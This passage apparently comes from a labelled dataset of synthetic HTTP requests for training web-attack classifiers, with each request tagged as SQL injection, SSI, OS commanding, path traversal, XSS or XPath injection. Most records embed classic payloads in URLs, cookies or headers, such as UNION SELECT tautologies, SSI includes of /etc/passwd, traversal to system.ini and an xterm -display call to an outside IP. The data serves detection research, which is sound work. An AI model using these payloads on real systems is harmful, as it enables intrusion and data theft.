Host: 232.208.170.235
Connection: che7d
Accept: text/xml;q=0.6, text/plain;q=0.6, image/jpeg;q=0.6
Accept-Charset: iso-8859-5;q=0.5, x-mac-hebrew;q=0.8, shift_jis
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=003
Client-ip: 255.200.38.137
Cookie: fibc3iey=28952;KbL0o1dyyd=219;6WtDjegbI=18
Cookie2: $Version="22"
Date: Sat, 23 Dec 06 09:43:13 CET
ETag: W/"SCzBCfLRWAMxc14"
Expect: 100-continue
From: clrwp@noorqoy.ch
If-Modified-Since: Sat, 17 Jun 06 08:23:59 UTC
If-Unmodified-Since: Fri, 26 Mar 10 24:51:45 GMT
If-Match: "P@pDzXFy4180esme4KQ"
If-None-Match: "k0IdiQkkiO.c1WsjFRBo"
If-Range: "l5GZ8QJ@b1YUE1VTo9"
Max-Forwards: 6891
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: NTLM WW9jaG5oZWlwYTBhc2JudGRlcGlyb2UxaWF3N0ZtaXJlaU5sb2JlZWxhZW4=
Range: -43,-33,199214-
Referer: /oaiMrido/vt9fn/enbsuet/ebyoe/eagyag.conf
TE: chunked;q=0.6,deflate;q=0.6,chunked;q=0.4
Trailer: Authorization
User-Agent: Mozilla/9.8 (Machintosh; U; Mac OS X 3.3; da-jf; rv:2.3.8) Gecko/94265009
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 084x9415
Via: 1.8 246.164.138.81
Transfer-Encoding: deflate
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 819 33.34.116.163 "Eun7wngOa" 
X-Forwarded-For: 208.27.214.144
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 47895
Start - Id: 35873
class: XPathInjection
GET /dwKbBKV449beqso4/RmNIQ1VYGMcmdvxlsadmin/eApnJO1/Te09@FR0mt/hontcuecshlCjScOheig/e.icsnDy@JaZH.2U5N/dtriialukdoy.tiff?ftpperlDGNGTX=nkd&E_4Xastdin=%7Emy&@L_fiS-1rm=38&e2=gperldRasrbgsoundKdae&qaai=%2Fm&dooretoo7lfan=ar4&d0Eumehpshmhpo=scriptl&1wMevalN7Lxterm=z+dropMaomocha%2Bbinsq1u&dneN=%28i++++%3C+count%28lQenTb%2Fchild%3A%3Atext%28%29%29++and+++j+%3C+count%28eazLns%2Fchild%3A%3Acomment%28%29%29++++and+++k+%3C+++++count%28yx%2Fchild%3A%3A*%29+%29&dlry6si=sUl2bufromttmaph&5tnewewwmwq=nullmtservices%7Ceaform%7Es&tjeso=8184670748&fnht=49197&r1nk=k%3Ees HTTP/1.0
Host: www.nsthetnbZ.it
Connection: close
Accept: video/*;q=0.8, video/mpeg, text/plain;q=0.4
Accept-Charset: iso-8859-8-i;q=0.7, x-mac-arabic;q=0.7, windows-1252, windows-1255
Accept-Encoding: gzip, compress;q=0.8, identity;q=0.0, deflate;q=0.2
Accept-Language: *
Cache-Control: max-age=606
Client-ip: 167.85.209.229
Cookie: 5tEwehBBL=25975;kyd2JByaX=800840;Z-._9e_.=Shatih3u4tot4t9a;sght0evCtId=enbin(uc8;olioeest=nwbrCXZmCyiv
Date: Tue, 09 May 06 21:08:11 CET
ETag: "j6_RBDMJQV7b5lSDIfdF"
Expect: 100-continue
From: d49tka@erigitaa.biz
If-Modified-Since: Thu, 11 Mar 04 03:50:24 UTC
If-Unmodified-Since: Sat, 01 Aug 09 08:16:26 UTC
If-Match: "j6Rux0wYcW_xhFcn"
If-None-Match: "iRj6VMbTsS6X_calJ-kD"
If-Range: "dqRxJoyWTa7pbqw4Ze"
Max-Forwards: 524
MIME-Version: 4.5
Pragma: vedr='ak4jtI'
Proxy-Authorization: Digest nonce
Authorization: dcxnx vuow=u1e0
Range: 440415-33194,1644-5
Referer: http://tnKfs7ph.net/tifDo/sdsj/nsjdtb.dll
Trailer: If-Match
User-Agent: Mozilla/3.3 (Machintosh; U; PPC Mac OS X 2.2; c4-pi; rv:5.2.1) Gecko/51258393
UA-OS: Linux
UA-Color: color32
Via: 8.7 240.21.251.172
Transfer-Encoding: AEnWe; ysiITcwr=esret
Upgrade: hic/2.2, m8rwk1/9.9
Warning: 683 214.32.116.161 "fdrit" "Thu, 11 Jun 09 24:41:37 GMT"
X-Serial-Number: 160475

null

End - Id: 35873
Start - Id: 40746
class: SSI
GET /t-B6u_mr-RpLo/x0hd/1irc0aH1leHhetro/a5t6llw/fi0D7Z8EsQNDqO/ezXy.tX52U8/jclEdrEoiuaiaio.jpeg?fqlinkDjS=oc&39fr=q%3Ah&eosrOh6Idna3=u7i%3B&hmefx0isey=6 HTTP/1.0
Host: 127.28.16.195:80
Connection: AtorEip
Accept: */*;q=0.4
Accept-Charset: iso-8859-7;q=0.1, windows-1257;q=0.5
Accept-Encoding: 
Cookie: ew=hFUtfeaqee;XTzUbmwqqX=ieo r;tie=eE5fth;@6uarH3FZ5=clo;eCehSi=<!--#odbc    connect="mi0ih,ovro,btT"       statement="select     *   from xs9dS"-->
Cookie2: $Version="93"
Date: Tue, 27 Oct 09 01:03:19 CET
If-Modified-Since: Fri, 28 Oct 05 13:35:52 GMT
If-Match: *
Max-Forwards: 15
Referer: /cssmJhhn/5o4saNi/3Xnazs/tubn/aitHqt.asp
TE: trailers
User-Agent: yooew8ta (e_COZYAz3e; juDKfsX9q6; oN88s_; w1zuUmDFcp; 0NxVO7AcJ)
Via: 5.1 www.roogthl.jpg:95, 4.0 www.Yieiniib.css, FTP/9.5 247.2.207.83

null

End - Id: 40746
Start - Id: 41569
class: SqlInjection
GET /eNN3e-br/x5k/le1jx1JL4pz_/zv/Oopen9.LC5@ygjZum/fy3EpH/4Oaa6Tv0/ollwneiaot5/7ncxVBjopenopenYO/eqWUt8c0ubP2fjTW.exe?rottrteje=%27+UNION+++++++++ALL+++++++++++++SELECT+++Ed+FROM+++oi0as+++++WHERE++++%27%27+%3D%27 HTTP/1.1
Host: www.eon2cnyqeh.gov
Connection: eedeH3
Accept: text/plain, application/zip
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: afrhy-n6helent, c-r1vmhntg;q=0.9, eghzs1o-tbs;q=0.0
Cache-Control: only-if-cached
Client-ip: 215.163.226.165
Cookie: ATinputE9vbscript@yphpZXI=uzBJcerepdu;WsjaanisseesIy=ucbt5;X6eams=eeinputadhagieen4;taRlihdmUxasyh=nullshHeform di7sN;tuloarxm=s7gtsnis&l8;ttOe=SxelpnhDss
Cookie2: $Version="800"
Date: Sun, 14 Oct 07 01:20:37 CET
ETag: W/"sNnvRJCaRvAF.71Ckvma"
Expect: oAcs=EcpeLe
From: usaacy07@scsi6.be
If-Modified-Since: Sat, 30 Aug 08 10:49:26 UTC
If-Unmodified-Since: Thu, 09 Oct 08 12:48:26 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 12 May 06 13:14:42 GMT
Max-Forwards: 046
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: NTLM enJpazhlb2V5ZXhlZmVuZkQ3T2FldXZvM3Q5MGVldUdyaXJpdGxzZWVm
Range: 629953-,-3
Referer: /dofcas/ls8J5rdu/61oss.conf
TE: trailers,gzip,chunked
Trailer: If-Range
User-Agent: rciTTsv.U http://www.LTe1.biz
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: HTTP/9.9 181.191.40.93, 9.3 243.126.203.94
Transfer-Encoding: gzip
Upgrade: 3tEa/9.4, oj11/9.7, esau/8.0, eLE3/8.3, jffkop/1.4
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 27867012215439
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41569
Start - Id: 43186
class: OsCommanding
GET /hao5bGo/etaUce6Tw5sten/anptogaccl4eaLtma/aot.php3?tEniw=%5Cr+++xterm+++-display++++116.214.59.4%3A0.0&iwoaywIse=erebR%2BincludeRpatiig4tal HTTP/1.0
Host: 189.125.62.170
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-9;q=0.2, x-mac-cyrillic, iso-8859-1, euc-tw
Accept-Encoding: identity;q=0.4
Accept-Language: cE9c-v, Hdd-ooAhs;q=0.7
Cache-Control: no-transform
Client-ip: 177.135.197.204
Cookie: ev=2071855;DsLBG=426688;uk=50
Cookie2: $Version="8"
Date: Wed, 04 Aug 04 24:15:48 UTC
ETag: "HABkqnWhO1su-A-n"
Expect: 100-continue
From: 9aythl@Osdt.st
If-Modified-Since: Thu, 29 Apr 04 10:38:25 CET
If-Unmodified-Since: Mon, 14 Apr 08 05:20:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6965
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: 3ndn s8tn=stem
Authorization: Basic ZHBudTk6ZmliSWVkaGU=
Range: 332370-1588,656-95
Referer: /ymxnmdAa.dll
TE: deflate;q=0.9,trailers
Trailer: Pragma
User-Agent: Mozilla/7.8 (Machintosh; U; PPC Mac OS X 0.7; ga-mi; rv:0.9.2) Gecko/54574026
UA-CPU: StrongARM
UA-Disp: 1503,1276,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x846
Via: 0.1 www.eeelpgr.js, a2on/9.9 www.ia8a2ezO.gif
Transfer-Encoding: compress
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 306 www.gnulF0h.html "etlXa" "Wed, 08 Aug 07 07:40:17 GMT"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 5739795926736555
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43186
Start - Id: 40466
class: SSI
GET /tIpthtkMUHv8o@/We@sHNOH@SbQ/t2rUC8dDN/leohf7u/soeis/tlstbweitrhtRledef/varVipdhQWyHds-/toCkJrDgeuV/2SoiGwUz1RVLt0.php4?rhjVso=77782&yae0rt5tco2m=renDietwt3xpl2&e4s=yg+drop+&pq=5&dCre3tni=ee7oxmlih&9-p8=%3C%21--+%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&lawsen=coEk0d0&z23azpttat=m6%2F1%26tMhE&2phgmIb=03120&hsbodt6m=9%5Cunionosrrp&AZQh2-jQ_zFQ=wp-+%7Ed+m%3EeDbuincludedt HTTP/1.0
Host: www.0hhre.ch:9
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.4
Accept-Language: 3os-cnncir;q=0.0, a5sa-ghlnnktl;q=0.7, ep-3;q=0.5, sy-oojr;q=0.8
Cache-Control: no-cache
Client-ip: 166.89.179.136
Cookie: ar=er
Cookie2: $Version="35"
Date: Fri, 24 Mar 06 02:08:11 CET
ETag: W/"CWkiioo0WdACHhp"
Expect: gacnoeoo
From: Yma7@5eefcOthto.biz
If-Modified-Since: Fri, 03 Jul 09 04:51:06 GMT
If-Unmodified-Since: Sat, 13 Dec 08 04:18:16 CET
If-Match: *
If-None-Match: *
If-Range: "n.x5zR7bnkS5zhEwH"
Max-Forwards: 374
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: NTLM NHJpdE9vbG5yYWU5ZTduMGVsM3NldGxndFhhbmdoYm9vOXR0cGVo
Range: 6740-758,0802-
Referer: /cirrna/ainm/9apr.conf
TE: gzip,trailers,trailers
Trailer: Range
User-Agent: Mozilla/5.0 (Machintosh; U; Mac OS X 0.5; 8n-aw; rv:8.6.3) Gecko/35419192
UA-CPU: 68000
UA-Disp: 0480,927,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 025x185
Via: lt2es/3.1 102.20.142.105, 4.3 www.roqsngy.jpg, 8.6 www.nmaer.html
Transfer-Encoding: gzip
Upgrade: euiyir/6.1, hfa8er/9.8, bIRueh/1.1
Warning: 432 242.146.77.146 "uIlneRnawNo7ctortf" 
X-Forwarded-For: 246.41.137.5
X-Serial-Number: 98565372421828
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40466
Start - Id: 36388
class: OsCommanding
GET /W2ZH/mVE53/neory3h5a6c8/twpB6/zQiHogM/oSM_CknKyQl01.OCur/2J/aH23P4g1d/ddFmUx/qooVleOOt6d/t4r4gok-7x.png?jb=c%40mFGzZEnNl&ityneEadv6tEg=oU-_rK&ssnglbessac7=5&astprrungdmw2=eianstg-7tm%5C&ppBHlocation=%3C%21--+++++%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5Cso%5CzutthcDtS%5CiCDsstAr.exe+++d%3A%5CWcwae%5Cwww.raseaninna.org%5Cenbeo%5Cdatabase.mdb++%2Fx++++exporttofoxpro%22--%3E&ruiotzdwr=035526442&brizs5srzerca=aacceptadh&1atcr9=52&_FHUddOMk9v=49016&aToogOn1o8=6ebehoiLnsdeletet2rsam&tgsgmhattbo=25770601&uZFfPoh3sMD=9e%3Ao&ugxwo7ey=sock_stream%25ut%3A&kips=ttb%40ta3 HTTP/1.1
Host: www.Oocrimttyt.net
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: m6puey-ctntv3, pek-hAen, di3er-pSesEeTo;q=0.0, eooedhu-ocu
Client-ip: 46.249.247.179
Cookie: cnhciae=rbb3YwLR;sh6ylte7stebtlz=svopeni;fwDuon=oreo
Cookie2: $Version="90"
Date: Thu, 22 Jul 04 15:53:41 UTC
ETag: "Y_FanZdQrXrmiFy"
If-Modified-Since: Tue, 13 Apr 10 02:36:24 GMT
If-Match: "KQIx-DOjTgMNU5i"
If-None-Match: *
Max-Forwards: 7
Pragma: no-cache
Authorization: Basic aWExbm5OZjpsZWxm
Referer: http://www.vrtat0ty.net/d0aF/twu6un.png
TE: trailers
User-Agent: Mozilla/6.5 (Machintosh; U; PPC Mac OS X 9.2; uf-ak; rv:2.8.9) Gecko/75493679
UA-Color: color8
UA-Pixels: 276x2290
Via: FTP/7.8 www.pnfraEI.shtml, Selxa/8.5 www.si5hcijr.html, HTTP/7.2 www.hmi2Vd.js
Transfer-Encoding: dira
Warning: 052 11.146.188.46:6 "inedno" 
----: ------------------------------

null

End - Id: 36388
Start - Id: 36029
class: PathTransversal
GET /rJc5IytHQ/TUF/39TGaoUZ4IkvMd84VS3/RrVydHY5uEdwhIS/ev/oonO3ogitnrTNeoLei/iies21nctatnaGeasl.jpeg?a5mee=nc9dl&t8xcmd6=731&eEonnohId=8tscRomDCtrCrtsttm&YZ5AUidlzHreplace=acmdty0&6ucopy9sJC4o=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fri%2Fel%2Fictealte%2Fveal.nsf&eAlr=weog&xqsHfaly=cAaRi7eo0w3wtu&F-0yXlikevt=cCSthP3&trfaaga=hieadbsAw9ande&gerheoat=gi&fswt0=02241&stamf=oc%25u&ehsth1gURsbj=x7esEtmbtt&tSVC48echoIm=24373067&rvhh=03 HTTP/1.1
Host: www.yneshh4c.net
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-chinesesimp, cp-932, iso-8859-4
Accept-Encoding: *;q=0.9
Accept-Language: thfeeso-t;q=0.0, Tbissas-aceei;q=0.3, nS3auOs-r
Cache-Control: min-fresh=34
Client-ip: 33.110.136.245
Cookie: HdN=ha
Cookie2: $Version="228"
Date: Thu, 06 Dec 07 01:45:53 CET
ETag: "1a58EMborIstQSXjUbu@"
Expect: 100-continue
From: hsmda3Ro@7c85h.biz
If-Modified-Since: Tue, 15 Apr 08 07:22:48 UTC
If-Unmodified-Since: Sat, 15 Apr 06 24:16:58 UTC
If-Match: "P965WHfPF_WavaNXnzTe"
If-None-Match: "dH9H.DIJE9oxAbgdUuh"
If-Range: Fri, 04 Jun 04 15:50:40 UTC
Max-Forwards: 1
MIME-Version: 3.0
Pragma: yr=en2n
Proxy-Authorization: Digest response="F3D851Dfd336Af39da99DEaF5dBB2eE4"
Authorization: NTLM ZGxuZW9jZW9hZ3h1bWRhb2lNdDJkemxsbWF6eHJyMHR0
Range: -05066,-92,-024075
Referer: http://www.6a6fh.biz/peqng28/ztrbr2.jpeg
TE: chunked;q=0.5
Trailer: If-Match
User-Agent: eeTO (obOEN8-)
UA-Disp: 1024,515,8
UA-OS: Windows 95
UA-Color: color8
Via: 3.8 241.0.82.130
Transfer-Encoding: identity
Upgrade: vki/8.2, ltp2/4.4, eeft/1.6
Warning: 341 181.125.130.56 "jenecjbHicooniain4f" "Thu, 13 Apr 06 16:57:19 GMT"
X-Forwarded-For: 213.226.164.18
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36029
Start - Id: 45409
class: PathTransversal
PUT /d-TkzZ/qeotsA/oateseoueeaMsvagZ/waaxo/rr6SQFTmmHC3/eneHEahdsWh8hhtt/dnaharu/k8K/rhSzKr5K3kvso/t9I3S/ow0paIHsssdroket.css? HTTP/1.1
Content-Length: 245
Content-Language: liWinrfe
Content-Encoding: compress
Content-Location: /lhsyqkd/pofi/ih1qene/ls86ar.mp3
Content-MD5: c21lZW9uZ25zdGxsdGFhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Mar 08 24:09:24 UTC
Last-Modified: Mon, 17 Mar 08 08:15:33 GMT
Host: 95.172.87.2:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.9
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 204.131.31.4
Cookie: swhhlsoanolc=xtermeewget3tq%e;ssylqlrotsiu=253816321;eedkwn7nfci=5301;positionrNJd= h
Cookie2: $Version="401"
Date: Wed, 21 May 08 18:24:54 CET
ETag: "WCamEE4jLaBwbRq"
Expect: tfrsm=sosgerh;sBoaj3pd=n6aTco
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sun, 21 Oct 07 20:07:30 GMT
If-Unmodified-Since: Sun, 19 Apr 09 13:57:57 GMT
If-Match: *
If-None-Match: "ZyM0YzM6F1Vm2sLWX@Z"
If-Range: "is5.OAWIIPMufqKrAkWQ"
Max-Forwards: 57
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM dHh0cndJZTlyZXRyb3NvZXNvdm9hbDVGb0hhclY3aGw=
Authorization: Basic ODZ0YWE6cnZ5cnd6d3A=
Range: 50-63221
Referer: /wr1n/ck1Hna.swf
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.0 (compatible; MSIE 9.5; Open BSD i586; tSgp7)
UA-CPU: PowerPC
UA-Disp: 9471,9312,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 789x027
Via: 1.7 www.EeUye.jpeg:2471, FTP/5.2 14.230.33.46, 9.5 244.163.75.91
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 279789
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Tt=rRteHit>z;t(hi&xt==ntaJnlibxl(opsbf &b3Ttrrca6=xsZo&tpoeom=6pxCIlMSZ5va&9SGwgetUmW_=ooiseul40>cien&eeoetiZner6=k:\windows\boot.ini&4doE2s6r=eobhobeSENmB&hH4Nwiae=%aS' 1&hEkf1lpDlf=olbsvtisE&S2sX81JrmaJ=le&impweosx=434145

End - Id: 45409
Start - Id: 45280
class: PathTransversal
GET /lTijeda2oadartelim/eknzSbkcyu/r9ts5iiGtm.jpeg?pbveendodro=3165723&9trlb73iSa=n4y&ue4imlchoaaon=xxmoldivdocumenthometij9&Gepssd5l6Lts=a%5Due6C+%5D%3F%3Bf&ei=tm04XQrw&2dnrna1I=ublUngd6&ssasdPo=855535006 HTTP/1.0
Host: www.agwa7tc.de:922
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish, x-mac-chinesetrad, windows-1258;q=0.1, iso-10646-ucs-2, euc-tw
Accept-Encoding: ..\..\..\..\..\..\WINNT\system.ini
Accept-Language: hod5gia-dAP;q=0.1, m9horen-P14rtt1
Cache-Control: no-transform
Client-ip: 226.116.80.221
Cookie: IqQ7N=5;tdpUtcicht8=6847591804;h2O58body-=jehns1Erenldacvoo;tduNu87anni=gtj\;k1vjvk5gcyV=6EOV47l92
Cookie2: $Version="4"
Date: Sat, 15 May 04 11:37:19 GMT
ETag: W/"z_Lxv-KpV.vaIaTVvBON"
Expect: 3NfuiTn
From: rrSptaq@ndtrp.gov
If-Modified-Since: Sat, 21 Jun 08 09:23:30 GMT
If-Unmodified-Since: Wed, 20 May 09 18:13:52 GMT
If-Match: "1q.rg9pp1bOd_g78q"
If-None-Match: *
If-Range: Thu, 12 Aug 04 17:47:59 CET
Max-Forwards: 9
Pragma: no-cache
Proxy-Authorization: NTLM dGFtbmFwdHZkcnNlMDJpUmtyZHRpRW9lb2VBN2lyemFnZW1oZQ==
Authorization: aaaelh etotl=zawlr
Range: 38-
Referer: http://s7tltass.cz/obr71.fgf
TE: trailers,trailers,gzip;q=0.0
Trailer: Expect
User-Agent: Mozilla/3.7 (X11; U; SunOS sun4u 8.5; os-rh; rv:2.8.4) Gecko/27324864
UA-OS: Solaris
Via: 1.6 www.pOce8ow.js, 2.9 www.rrtiO.shtml, 1.9 www.d3s9Seac.html
Transfer-Encoding: identity
Warning: 382 100.45.214.195 "nGnZ3swtEqlie1" "Sun, 10 Sep 06 01:36:11 GMT"
X-Forwarded-For: 238.149.119.17
X-Serial-Number: 552839024418370393
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45280
Start - Id: 42911
class: OsCommanding
POST /o2G.4zob-pGY_XX/HimEyPaslusararq70Iu/eepq8wshcu/2ER0DQi/ef0rneaoe8tofru9/nuleaenRsau/nE@mP1XsTv8TrqVp/wIRkyF-auJVUU.shtml? HTTP/1.1
Content-Length: 287
Content-Language: 5,iTihdNms,nmd
Content-Encoding: identity
Content-Location: /y8wen/astv/tuxwst.asp
Content-MD5: Z1VzZjdlYU90b3RyY2FEbg==
Content-Type: application/x-www-form-urlencoded
Host: www.al2vgtden.be
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-10646-ucs-2;q=0.9
Accept-Encoding: gzip, deflate;q=0.2
Accept-Language: *
Cache-Control: max-stale
Cookie: QgzCC-i=6anihotaD2ytho;tieaocenny1=B8m eepcp;its1trgjo=959889;ooFm07sdtisbON=57.10.33.139    | dir+c:\;rooaeEgi=hwnje7sdyhf;rtvdea2n=tdxl
Cookie2: $Version="7"
Date: Wed, 01 Jul 09 16:46:43 UTC
If-Match: "CzWVXRKOclIV6kln5N"
If-Range: "aV.mjxLWDgFx_MS"
Max-Forwards: 13
Proxy-Authorization: e4nceu ideoNai=o9tri
Referer: http://www.zsztagda.biz/tnoovt0/bedlqe/orxie/dzt1.mdb
User-Agent: Mozilla/3.9 (Machintosh; U; PPC Mac OS X 3.9; es-ui; rv:0.6.5) Gecko/67522592
UA-Color: color8
Via: 7.8 114.145.140.39

iOEMStRJPI=nh;tu|o&nistyoZQnCAe8a=spe2tayjhsAoe&aeofa=th1&tbtw2Ak=i/Ceeh>i)ne&BoP4.09=myN2GsQXt&sizrpeona=ulyamnasIoot&Gsser=;euliga$fa[Hfber&tL=C&ekEegio=2t&eeu=I dropeoee?tr &iOhri=0Ds9connectbindivacg&zbsnhery=oi&zei=nbrjo6ene&0fC-Zf=73491&ngwalMtc2iasrma=oGuRenra5s

End - Id: 42911
Start - Id: 48218
class: XSS
POST /gxNSrKecuS/w76TlWqK8AQwz61Pm@.shtml? HTTP/1.1
Content-Length: 53
Content-Language: olo
Content-Encoding: gzip
Content-Location: http://www.1hbwj.st/scHrrte.conf
Content-MD5: b2FrczdwN25zYW1uT2tocg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Dec 09 06:43:16 GMT
Last-Modified: Sat, 16 Sep 06 04:50:10 CET
Host: www.NAnani.gov:2006
Connection: faea
Accept: video/*, image/png, application/postscript
Accept-Charset: windows-1254;q=0.4, windows-1258;q=0.4, x-mac-japanese, iso-8859-8-i;q=0.9
Accept-Encoding: <a     href =   "  about:<s&#99;ript  >[alert  ('otmornll');]</script   >  "  >
Accept-Language: 8-tt8xsl;q=0.8, 1-Fn;q=0.3, yh9eO-ieu;q=0.1
Cache-Control: only-if-cached
Client-ip: 135.195.38.233
Cookie: hrw=oWifvAlin+3Ee5;8c=037593
Cookie2: $Version="426"
Date: Wed, 14 Oct 09 24:41:55 CET
From: mcitnbOr@s4Xde.gov
If-Modified-Since: Tue, 24 Feb 09 11:22:35 CET
If-Unmodified-Since: Sat, 26 Feb 05 01:12:19 GMT
If-Match: "pjYPo@8O0.fz47-LD"
If-None-Match: "2CKxIJxA7Zi6QnuM9@A"
If-Range: "x9tswjEQStIOCI_"
Max-Forwards: 822
Pragma: no-cache
Proxy-Authorization: Basic YWVhdHRxZzphc2ViaQ==
Authorization: eiheo htnv=doAtceb
Range: -484
Referer: http://www.5rteyesu.cz/iorh.txt
TE: chunked,gzip,chunked
Trailer: Accept-Charset
User-Agent: tspEL9shnp (gf.ebw; kMNrld5xn; rZmddZJnH)
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7334x400
Via: 1.5 24.145.44.19, FTP/3.6 www.rsrvnt.css, 4.5 219.11.63.145
Transfer-Encoding: deflate
Upgrade: eremce/4.3, xnzi/0.6, 6tgf/7.0, eal3Sa/3.7, tio/8.3
----: -------------------------

tDfr=3022022&sxie=formwserc uo&q_2h=tss&2jja8O=r/um

End - Id: 48218
Start - Id: 39837
class: SSI
POST /48BSyDIKga8/atcvir1Zt/hs5/eah.png? HTTP/1.0
Content-Length: 26
Content-Language: 19z
Content-Encoding: compress
Content-MD5: MWtTdGRXNnRuZW9lcm9lZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 Feb 09 11:45:32 GMT
Host: 159.165.114.137
Connection: keep-alive
Accept: */*
Accept-Encoding: <!--     #include    virtual="/etc/passwd"  -->
Accept-Language: Apirelu8-nltysfl;q=0.7, i-Avshohdd, u-wri;q=0.0
Cache-Control: no-store
Cookie: hs4ee=moo;rtderisss1=bDTeWL90;oZ5dStsmoua=h9n;sala=Hke26ttrc2ecTadest;wgetyexec3ie1Ixw=fwre5 )eobject;eEhefdow=isedutcbs3dpuo
Cookie2: $Version="6"
Date: Tue, 02 Mar 10 24:34:04 CET
Expect: 100-continue
If-Unmodified-Since: Fri, 05 Mar 04 03:06:44 CET
If-Match: "0GVQueIJ48YV3v4g"
If-None-Match: *
If-Range: Fri, 30 Dec 05 05:13:25 UTC
Max-Forwards: 6
Authorization: Basic czBlcng6VWlzdG5jZFI=
Referer: http://oEgwigYc.com/5tnes/sanhstr.js
User-Agent: Mozilla/5.7 (X11; U; Open BSD i386 2.9; Mi-aa; rv:4.5.2) Gecko/39002200
UA-Pixels: 769x5437
Transfer-Encoding: shtt

ii9yIAo6eegml1h=s9RvsrzTen

End - Id: 39837
Start - Id: 41732
class: SqlInjection
GET /40pps_.uN-r/a3iSF9L/nr/e8KyJ9WOWQul3mluj/rmjPWHwyvtwinntAwK.P/heEt/ealeolemhfT/iMadet5ifxacd/qhwWnxGjLby9@0-NeGCE/Ypusr7nph-2Pp_.gW/tuw_efB@C.jpeg?hmt=171651&W0fZseP3tmp=049265&eiu3nuonr=cf%7Cofa&smToa=l40bsmh%40n&eioiloaadsmqa=e%40DR%40U&neuihpdnsea=%27+++OR+++%27ducnsMew%27+%3D+++++%27msRc%27%2B%27icelj5t%27&isqa=rIL%40XZ8v6&rhva2d7ti0si=lnr8aNikesenutdluH&Ceyca=BApaPk2dcsI0nNoiu HTTP/1.0
Host: 195.154.118.170
Connection: yhooet9o
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=983
Client-ip: 232.216.240.252
Cookie: 4arw8R=91828
Cookie2: $Version="023"
Date: Thu, 10 Mar 05 07:35:30 CET
ETag: "x-y4MP-XTys@LWVZvO_A"
Expect: 100-continue
From: tn3rs6or@Itnftdpo.biz
If-Modified-Since: Thu, 10 Jul 08 20:51:12 UTC
If-Unmodified-Since: Sun, 08 Apr 07 01:30:30 GMT
If-Match: "O1j4Oo5sKpacAgUngj"
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: Tue, 03 Jul 07 14:53:03 GMT
Max-Forwards: 073
MIME-Version: 5.7
Pragma: luamuo=xo
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: atrPel w3heesC=beau
Range: 111-,-67748,-483206
Referer: /t8asT/ulohh.pl
TE: deflate;q=0.1,trailers
Trailer: Trailer
User-Agent: gcsSJWr1s http://www.jiassitc.uk
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 3172x1738
